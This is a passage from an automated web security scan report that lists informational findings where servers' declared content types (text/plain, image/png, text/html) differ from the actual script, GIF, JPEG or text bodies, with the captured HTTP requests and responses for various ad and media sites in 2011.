User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jDClaTYi0cbS00001kkgaaRpa038X00001hITfaPj402WG00001jkozaUUI0c7w00001kfxTaPj40aLz00001iWmhaSED0cb100001jNtbaUUO09sO00000kfL6aPj30aLz00001htTqaPvL02WG00001jmdWaRBM0c7w00001jDDbaTYi0cbS00001kWgdaUUO09SF00001iOnPaUUK03sY00001kDFiaPj408HF00001kDBSaRp908HF00001jxYWaUMm0bn800001kMmAaPj208B400001jpQXaRwv05qO00001kHfhaPj302WG00001hWjPaRu109wy00002jDDnaUUx0cbS00001iOpqaUUK03sY00001jkncaRBL0c7w00001jBrJaXnu035P00001kSTxaRuU06yP00001jA0ZaPj206hH00001kGfMaPj208HF00002jkpdaPj30c7w00001jAsGaPj002WG00001jNtfaUUK09sO00000kCKXaXnm08HG00001kQ2WaUUO0dKm00001kZ5yaTDK07Y700001kDAVaRp908HF00001kMqaaPj302WG00001kEncaRLI0alG00001iBmTaRqF08te00001kHhnaUnJ02WG00001kMnvaPj008B400001kcLvaUUK0dCb00001; B3=8Vlw0000000001u+a9iq0000000001uQ9j0T0000000001u+afDX0000000002uK990p0000000001v59ZD90000000001uQ9fOC0000000002uK8nlR0000000001uK9cm20000000001uTalVe0000000001u+a0fG0000000001uZ8DfZ0000000001uKajUW0000000001u+89+70000000001uQahIj0000000001uK9XzA0000000001u+93LT0000000001uQ9i8d0000000001uKahI50000000001uK84hR0000000002uQ9xux0000000001uXa9it0000000001uQ9i8b0000000001uK9D2u0000000000u+9X5M0000000001uW8DfJ0000000001uK9iQ70000000002uQ9D2y0000000000u+9xuy0000000001uX7dOu0000000001uY9XJ40000000001uR9gvS0000000001uKa9j40000000001uK9v4a0000000001uK90mq0000000001v59gvT0000000001uK7dYp0000000001uK9qZf0000000001uQ9xup0000000001u+8Vlx0000000001u+

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=le30aXzt06hH00002jDClaTYi0cbS00001kkgaaRpa038X00001hITfaPj402WG00001jkozaUUI0c7w00001kfxTaPj40aLz00001iWmhaSED0cb100001jNtbaUUO09sO00000kfL6aPj30aLz00001htTqaPvL02WG00001jmdWaRBM0c7w00001jDDbaTYi0cbS00001kWgdaUUO09SF00001iOnPaUUK03sY00001kDFiaPj408HF00001kDBSaRp908HF00001jxYWaUMm0bn800001kMmAaPj208B400001jpQXaRwv05qO00001kHfhaPj302WG00001hWjPaRu109wy00002jDDnaUUx0cbS00001iOpqaUUK03sY00001jkncaRBL0c7w00001jBrJaXnt035P00001kSTxaRuU06yP00001jA0ZaPj206hH00001kGfMaPj208HF00002jkpdaPj30c7w00001jNtfaUUK09sO00000kCKXaXnm08HG00001kQ2WaUUO0dKm00001kZ5yaTDK07Y700001kDAVaRp908HF00001kMqaaPj302WG00001kEncaRLI0alG00001iBmTaRqF08te00001kHhnaUnJ02WG00001kMnvaPj008B400001kcLvaUUK0dCb00001; expires=Sun, 11-Sep-2011 20:13:56 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8Vlw0000000001u+a9iq0000000001uQ9j0T0000000001u+990p0000000001v59ZD90000000001uQ9fOC0000000002uK8nlR0000000001uK9cm20000000001uTalVe0000000001u+amoJ0000000002v5a0fG0000000001uZ8DfZ0000000001uKajUW0000000001u+89+70000000001uQahIj0000000001uK9XzA0000000001u+93LT0000000001uQ9i8d0000000001uKahI50000000001uK84hR0000000002uQ9xux0000000001uXa9it0000000001uQ9i8b0000000001uK9D2u0000000000u+9X5M0000000001uW8DfJ0000000001uK9iQ70000000002uQ9D2y0000000000u+9xuy0000000001uX7dOu0000000001uY9XJ40000000001uR9gvS0000000001uKa9j40000000001uK9v4a0000000001uK90mq0000000001v59gvT0000000001uK7dYp0000000001uK9qZf0000000001uQ9xup0000000001u+8Vlx0000000001u+; expires=Sun, 11-Sep-2011 20:13:56 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 14 Jun 2011 00:13:55 GMT
Connection: close
Content-Length: 2180

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
28.5. http://catrg.peer39.net/301/358/2034929301  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://catrg.peer39.net
Path:   /301/358/2034929301

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /301/358/2034929301?aid=00712&sid=00000&pu=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html&cc=/7QnkE80XLKzILiqpjgeKxf/yYqPe70zfdO7mPRtaGk%3D&pr=http%3A//online.wsj.com/public/page/news-tech-technology.html%3Frefresh%3Don&pt=%27Daily%20Deals%27%20Help%20Digital%20Ad%20Firms%20Break%20Their%20Pattern%20in%20Local%20Market%20-%20WSJ.com&sd=3192070 HTTP/1.1
Host: catrg.peer39.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "e3b6b9080f5a39d09f1969193150fa07:1307996363"
Last-Modified: Mon, 13 Jun 2011 20:19:07 GMT
Accept-Ranges: bytes
Content-Length: 536
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:14:09 GMT
Connection: close
X-N: S

function getTargetingTags_712() { return '<?xml version="1.0" encoding="UTF-8"?><responseContainer><service><classifier><category path="Business" description="" name="Business" id="220"/><category pa
...[SNIP]...
28.6. http://community.mtv.com/Overlays/LogIn.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://community.mtv.com
Path:   /Overlays/LogIn.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com HTTP/1.1
Host: community.mtv.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
Content-Length: 1564
Origin: http://community.mtv.com
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
X-MicrosoftAjax: Delta=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D; MTV_ID=209.18.38.165.1308010776270; s_ppv=65; ReturnUrl=http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com; MasterAuthIsRequested=true

ctl00%24ctl00%24phBody%24scriptManager=ctl00%24ctl00%24phBody%24phBody%24cLogin%24ctl00%7Cctl00%24ctl00%24phBody%24phBody%24cLogin%24lbForgotPassword&__EVENTTARGET=ctl00%24ctl00%24phBody%24phBody%24cL
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Server: w07w
App: ww
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
Cteonnt-Length: 11486
Content-Length: 11486
Date: Tue, 14 Jun 2011 00:28:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: IsMasterAuthResponse=false; expires=Mon, 14-Jun-2010 00:28:31 GMT; path=/
Set-Cookie: IsMasterAuthResponse=false; expires=Mon, 25-Aug-2008 19:01:02 GMT; path=/

...1|#||4|4099|updatePanel|ctl00_ctl00_phBody_phBody_cLogin_ctl00|
           

           <div class="blockContent">
               <h1 class="hugeTitle">Forgot your Password?</h1>
               <div class="floatListWrap">
                   <d
...[SNIP]...
28.7. http://cs.wsj.net/community/content/images/misc/groups/industriesrolodex.80x80.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cs.wsj.net
Path:   /community/content/images/misc/groups/industriesrolodex.80x80.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /community/content/images/misc/groups/industriesrolodex.80x80.png HTTP/1.1
Host: cs.wsj.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 2747
Content-Type: image/png
Content-Location: http://cs.wsj.net/community/content/images/misc/groups/industriesrolodex.80x80.png
Last-Modified: Fri, 18 Mar 2011 17:55:54 GMT
Accept-Ranges: bytes
ETag: "071c8b995e5cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:14:04 GMT

GIF89aP.P...................qqq............]]]bbb...}}}...iiivvvyyy...mmmeee............;;;............YYY...UUUPPP%%%...333............MMM............III..................DDD......@@@................
...[SNIP]...
28.8. http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.25x25.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cs.wsj.net
Path:   /community/content/images/misc/groups/otherquestionmark.25x25.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /community/content/images/misc/groups/otherquestionmark.25x25.png HTTP/1.1
Host: cs.wsj.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 501
Content-Type: image/png
Content-Location: http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.25x25.png
Last-Modified: Fri, 18 Mar 2011 17:55:54 GMT
Accept-Ranges: bytes
ETag: "071c8b995e5cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:14:04 GMT

GIF89a.........................mmm.........vvviii.........zzz]]]...bbbrrr........................xxx~~~|||...............NNN.................................HHH..................fff.........VVV???....
...[SNIP]...
28.9. http://cs.wsj.net/community/content/images/misc/members/defaultuser.50x50.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cs.wsj.net
Path:   /community/content/images/misc/members/defaultuser.50x50.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /community/content/images/misc/members/defaultuser.50x50.png HTTP/1.1
Host: cs.wsj.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 1559
Content-Type: image/png
Content-Location: http://cs.wsj.net/community/content/images/misc/members/defaultuser.50x50.png
Last-Modified: Fri, 18 Mar 2011 17:55:54 GMT
Accept-Ranges: bytes
ETag: "071c8b995e5cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:14:04 GMT

GIF89a2.2.......DDD...888.........KKKUUUYYYjjj...aaahhh...^^^........................fff.........QQQ...ddd...........................uuuyyy~~~xxxsssrrr{{{}}}qqqttt|||...ooo......nnnmmm...lll...zzzvvvw
...[SNIP]...
28.10. http://d.yimg.com/ce/soup/soup_generated_fragment.gne  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://d.yimg.com
Path:   /ce/soup/soup_generated_fragment.gne

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /ce/soup/soup_generated_fragment.gne HTTP/1.1
Host: d.yimg.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 23:35:37 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Mon, 13 Jun 2011 22:00:28 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=3600
Content-Type: text/plain; charset=utf-8
Age: 2856
Content-Length: 428348
Proxy-Connection: keep-alive
Server: YTS/1.17.23.1

soupCallback({"d":"<div id=\"\" class=\"sq photo-display-container clearfix\"><a name=\"photo5345688253\"><\/a><div class=\"photo-display-item\" id=\"photo_5345688253\" data-photo-id=\"5345688253\" d
...[SNIP]...
28.11. http://fluxstatic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fluxstatic.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: fluxstatic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: f002
SId: pCdn
Date: Tue, 14 Jun 2011 00:29:26 GMT
Content-Length: 11

Bad Request
28.12. http://l.apture.com/v3/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://l.apture.com
Path:   /v3/

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /v3/?4=%7B%22pageId%22%3A343348986%2C%22visitId%22%3A23247798873571%2C%22duration%22%3A12219328%2C%22numLinks%22%3A0%2C%22numLinksOpened%22%3A0%2C%22durationPopupsOpened%22%3A0%2C%22numTmmLinks%22%3A0%2C%22type%22%3A1025%2C%22siteId%22%3A79096%7D&AC=s4te21hWKP HTTP/1.1
Host: l.apture.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
Origin: http://tunedin.blogs.time.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST
Access-Control-Max-Age: 604800
Content-Length: 2
Date: Mon, 13 Jun 2011 14:42:50 GMT
Connection: close

{}
28.13. http://now.eloqua.com/visitor/v200/svrGP.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /visitor/v200/svrGP.asp?pps=3&siteid=577&ref2=elqNone&tzo=360&ms=224 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.pega.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=3FED00B3830C43E6A35A88AB0C1B4136; ELQSTATUS=OK; __utmz=16459234.1306359787.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=2150246959903343989; __utma=16459234.18880641.1306359787.1306377949.1306389346.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 14 Jun 2011 12:27:59 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;
28.14. http://online.wsj.com/public/page/0_0_WC_HeaderWeather-10005.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://online.wsj.com
Path:   /public/page/0_0_WC_HeaderWeather-10005.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /public/page/0_0_WC_HeaderWeather-10005.html HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; __utmz=1.1305367794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2233%22%2C%22high%22%3A%5B%2279%22%5D%2C%22low%22%3A%5B%2267%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DFri%2C%2027%20May%202011%2011%3A56%3A54%20GMT%7C%7CweatherCode%3D10005; _chartbeat2=wh4hk9xmdxztvs8m; rsi_csl=lA; rsi_segs=G07608_10001; __utma=1.1748330365.1305367794.1305373038.1306496231.3; DJSESSION=continent%3dna%7c%7czip%3d20001%2d20020%7c%7ccountry%3dus%7c%7cregion%3ddc%7c%7cORCS%3dna%2cus%7c%7ccity%3dwashington%7c%7clongitude%3d%2d77.0369%7c%7ctimezone%3dest%7c%7clatitude%3d38.8951; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D1; s_cc=true; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:13:54 GMT
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep07 - Mon 06/13/11 - 08:55:13 EDT
Cache-Control: max-age=15
Expires: Tue, 14 Jun 2011 00:14:09 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 924
Content-Type: text/html; charset=UTF-8


<ul class="local-info">
<li class="location"><a id="w_location" href="http://online.wsj.com/public/page/accuweather-detailed-forecast.html?name=New York, NY&location=10005&u=http%3A//www.accuweathe
...[SNIP]...
28.15. http://pglb.buzzfed.com/63975/17983acd3149cc7b59eebf3385392137  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pglb.buzzfed.com
Path:   /63975/17983acd3149cc7b59eebf3385392137

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /63975/17983acd3149cc7b59eebf3385392137?callback=BF_PARTNER.gate_response&cb=8678 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 38
Cache-Control: max-age=264195
Expires: Fri, 17 Jun 2011 01:40:08 GMT
Date: Tue, 14 Jun 2011 00:16:53 GMT
Connection: close

BF_PARTNER.gate_response(1280325136);
28.16. http://s2.wp.com/mshots/v1/http%3A%2F%2Fbengunby.wordpress.com%2F2011%2F06%2F13%2Fits-not-wrong-to-be-happy-lebron-james-lost%2F  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://s2.wp.com
Path:   /mshots/v1/http%3A%2F%2Fbengunby.wordpress.com%2F2011%2F06%2F13%2Fits-not-wrong-to-be-happy-lebron-james-lost%2F

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /mshots/v1/http%3A%2F%2Fbengunby.wordpress.com%2F2011%2F06%2F13%2Fits-not-wrong-to-be-happy-lebron-james-lost%2F?w=222 HTTP/1.1
Host: s2.wp.com
Proxy-Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=43200
Content-Type: image/png
Date: Tue, 14 Jun 2011 00:31:19 GMT
Expires: Tue, 14 Jun 2011 12:31:19 GMT
Last-Modified: Mon, 13 Jun 2011 13:58:33 GMT
Server: ECS (dca/532C)
X-Cache: HIT
Content-Length: 28688

......JFIF.............<CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 100
...C....................................................................C.............................................
...[SNIP]...
28.17. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://spd.pointroll.com
Path:   /PointRoll/Ads/PRScript.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /PointRoll/Ads/PRScript.dll?v=129&pos=0&init=1&delay=0&push=0&set=2&bye=1&intact=3 HTTP/1.1
Host: spd.pointroll.com
Proxy-Connection: keep-alive
Referer: http://ads.pointroll.com/PortalServe/?pid=1188614T19920110117205515&cid=1478425&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b26/3/0/*/v%3B242169367%3B0-0%3B3%3B39555935%3B3454-728/90%3B40388893/40406680/1%3Bu=!category-games|pos-atf|tag-adj|mtype-standard|sz-728x90|tile-2|demo-D|demo-T|demo-5840|demo-2966|demo-2907|demo-2905|demo-2904|demo-1607|demo-1299|demo-850|demo-848|demo-844|demo-827|demo-790|demo-777|demo-775|demo-774%3B~aopt=2/1/c6a3/0%3B~sscs=%3F$CTURL$&time=1|19:19|-5&r=0.015173257561400533&flash=10&server=polRedir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRbu=Eo1TOtJ24; PRgo=BBBAAuILCBVCFUE6C.BZm.!B!B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-Type: text/plain
Content-Length: 12989
Date: Tue, 14 Jun 2011 00:19:16 GMT
Connection: close

/*PointRoll.2011 v129*/var priw,prih,prz=0,przo=0,prsw=0,prrv=0,prpi=0,prtg=0,prta=1,prpc='',prpf,prcw,prad=0,prca=0,prff=0,prmh=0,prup=0,proto,proto2,prbf=0,proo=0,prgo=0,pria=0,prpdts,prpot=0,prFlag
...[SNIP]...
28.18. http://static0.fluxstatic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://static0.fluxstatic.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: static0.fluxstatic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2599960
Date: Tue, 14 Jun 2011 00:29:18 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found
28.19. http://us.havaianas.com/scripts/jquery/jquery.bgiframe.min.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://us.havaianas.com
Path:   /scripts/jquery/jquery.bgiframe.min.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /scripts/jquery/jquery.bgiframe.min.js HTTP/1.1
Host: us.havaianas.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://us.havaianas.com/MYOH.html

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 17:56:10 GMT
Server: Apache
Last-Modified: Mon, 13 Jun 2011 14:07:37 GMT
ETag: "3fe0711-7234-4df619a9"
Accept-Ranges: bytes
Content-Length: 29236
Content-Type: application/javascript

jQuery(function(a){a.datepicker.regional.ar={closeText:"..........",prevText:"&#x3c;............",nextText:"............&#x3e;",currentText:"..........",monthNames:[".......... ............","........
...[SNIP]...
